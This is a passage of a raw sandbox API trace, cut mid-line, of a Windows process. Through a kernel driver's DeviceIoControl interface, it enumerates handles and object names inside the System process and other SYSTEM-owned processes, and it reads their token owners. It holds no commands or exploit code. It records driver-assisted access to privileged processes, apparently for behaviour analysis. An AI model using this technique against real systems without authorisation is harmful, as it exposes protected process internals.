(HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0241.326] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.326] PsAcquireProcessExitSynchronization () returned 0x0 [0241.326] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.326] ObReferenceObjectByHandle (in: Handle=0xffffffff80000814, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f2f20, HandleInformation=0x0) returned 0x0 [0241.326] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.326] PsReleaseProcessExitSynchronization () returned 0x2 [0241.326] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.326] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0241.326] ObfDereferenceObject (Object=0xfffffa80029f2f20) returned 0x3 [0241.326] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.326] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0xc8 [0241.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0241.326] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8007ff84f0, HandleInformation=0x0) returned 0x0 [0241.326] ObOpenObjectByPointer (in: Object=0xfffffa8007ff84f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0241.326] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x18 [0241.326] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa8003943280 | out: TokenHandle=0xfffffa8003943280*=0xc4) returned 0x0 [0241.326] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0241.326] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.326] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0241.327] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0241.328] CloseHandle (hObject=0xc4) returned 1 [0241.328] CloseHandle (hObject=0xc8) returned 1 [0241.328] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.328] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0241.328] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.328] PsAcquireProcessExitSynchronization () returned 0x0 [0241.328] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0241.484] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eb5d80, HandleInformation=0x0) returned 0x0 [0241.484] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.484] PsReleaseProcessExitSynchronization () returned 0x2 [0241.484] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0241.484] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0241.484] ObfDereferenceObject (Object=0xfffffa8002eb5d80) returned 0x1 [0241.484] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.484] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.484] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0241.484] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.484] PsAcquireProcessExitSynchronization () returned 0x0 [0241.484] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0241.686] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002cd9880, HandleInformation=0x0) returned 0x0 [0241.686] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.686] PsReleaseProcessExitSynchronization () returned 0x2 [0241.686] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0241.686] ObQueryNameString (in: Object=0xfffffa8002cd9880, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.687] ObfDereferenceObject (Object=0xfffffa8002cd9880) returned 0x1 [0241.687] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.687] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.687] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0241.687] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.687] PsAcquireProcessExitSynchronization () returned 0x0 [0241.687] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0242.067] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eb5ae0, HandleInformation=0x0) returned 0x0 [0242.067] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0242.068] PsReleaseProcessExitSynchronization () returned 0x2 [0242.068] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0242.068] ObQueryNameString (in: Object=0xfffffa8002eb5ae0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0242.068] ObfDereferenceObject (Object=0xfffffa8002eb5ae0) returned 0x1 [0242.068] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0242.068] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0242.068] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0242.068] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0242.068] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0242.068] PsAcquireProcessExitSynchronization () returned 0x0 [0242.068] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0242.292] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eb5990, HandleInformation=0x0) returned 0x0 [0242.292] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0242.292] PsReleaseProcessExitSynchronization () returned 0x2 [0242.292] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0242.292] ObQueryNameString (in: Object=0xfffffa8002eb5990, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0242.292] ObfDereferenceObject (Object=0xfffffa8002eb5990) returned 0x1 [0242.292] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0242.292] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0242.292] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0242.292] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0242.293] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0242.293] PsAcquireProcessExitSynchronization () returned 0x0 [0242.293] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0242.565] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eb5840, HandleInformation=0x0) returned 0x0 [0242.565] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0242.565] PsReleaseProcessExitSynchronization () returned 0x2 [0242.565] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0242.565] ObQueryNameString (in: Object=0xfffffa8002eb5840, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0242.565] ObfDereferenceObject (Object=0xfffffa8002eb5840) returned 0x1 [0242.565] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0242.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0242.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0242.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0242.566] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0242.566] PsAcquireProcessExitSynchronization () returned 0x0 [0242.566] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0242.939] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eb56f0, HandleInformation=0x0) returned 0x0 [0242.939] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0242.939] PsReleaseProcessExitSynchronization () returned 0x2 [0242.939] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0242.939] ObQueryNameString (in: Object=0xfffffa8002eb56f0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0242.940] ObfDereferenceObject (Object=0xfffffa8002eb56f0) returned 0x1 [0242.940] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0242.940] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0242.940] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0242.940] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0242.940] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0242.940] PsAcquireProcessExitSynchronization () returned 0x0 [0242.940] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0243.134] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002cd7070, HandleInformation=0x0) returned 0x0 [0243.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.135] PsReleaseProcessExitSynchronization () returned 0x2 [0243.135] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0243.135] ObQueryNameString (in: Object=0xfffffa8002cd7070, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.135] ObfDereferenceObject (Object=0xfffffa8002cd7070) returned 0x1 [0243.135] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0243.135] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.135] PsAcquireProcessExitSynchronization () returned 0x0 [0243.135] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0243.318] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002cd7f20, HandleInformation=0x0) returned 0x0 [0243.318] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.318] PsReleaseProcessExitSynchronization () returned 0x2 [0243.318] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0243.318] ObQueryNameString (in: Object=0xfffffa8002cd7f20, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.318] ObfDereferenceObject (Object=0xfffffa8002cd7f20) returned 0x1 [0243.318] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.319] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.319] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.319] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0243.319] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.319] PsAcquireProcessExitSynchronization () returned 0x0 [0243.319] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0243.499] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002cd7dd0, HandleInformation=0x0) returned 0x0 [0243.499] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.499] PsReleaseProcessExitSynchronization () returned 0x2 [0243.499] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0243.499] ObQueryNameString (in: Object=0xfffffa8002cd7dd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.499] ObfDereferenceObject (Object=0xfffffa8002cd7dd0) returned 0x1 [0243.499] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.499] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.499] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.499] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.499] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.499] PsAcquireProcessExitSynchronization () returned 0x0 [0243.499] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880053c85d0) [0243.663] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0006f3970, HandleInformation=0x0) returned 0x0 [0243.663] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.663] PsReleaseProcessExitSynchronization () returned 0x2 [0243.663] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0243.663] ObQueryNameString (in: Object=0xfffff8a0006f3970, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.663] ObfDereferenceObject (Object=0xfffff8a0006f3970) returned 0x1 [0243.663] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.663] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xc8 [0243.664] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0243.664] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003533060, HandleInformation=0x0) returned 0x0 [0243.664] ObOpenObjectByPointer (in: Object=0xfffffa8003533060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0243.664] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7e [0243.664] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80025381c0 | out: TokenHandle=0xfffffa80025381c0*=0xc4) returned 0x0 [0243.664] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0243.664] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.664] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0243.664] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0243.666] CloseHandle (hObject=0xc4) returned 1 [0243.666] CloseHandle (hObject=0xc8) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0243.667] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.667] PsAcquireProcessExitSynchronization () returned 0x0 [0243.667] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.667] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003535f20, HandleInformation=0x0) returned 0x0 [0243.667] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.667] PsReleaseProcessExitSynchronization () returned 0x2 [0243.667] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.667] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.667] ObfDereferenceObject (Object=0xfffffa8003535f20) returned 0x1 [0243.667] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.667] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x36, lpOverlapped=0x0) returned 1 [0243.667] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.667] PsAcquireProcessExitSynchronization () returned 0x0 [0243.667] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.667] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a004425850, HandleInformation=0x0) returned 0x0 [0243.667] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.667] PsReleaseProcessExitSynchronization () returned 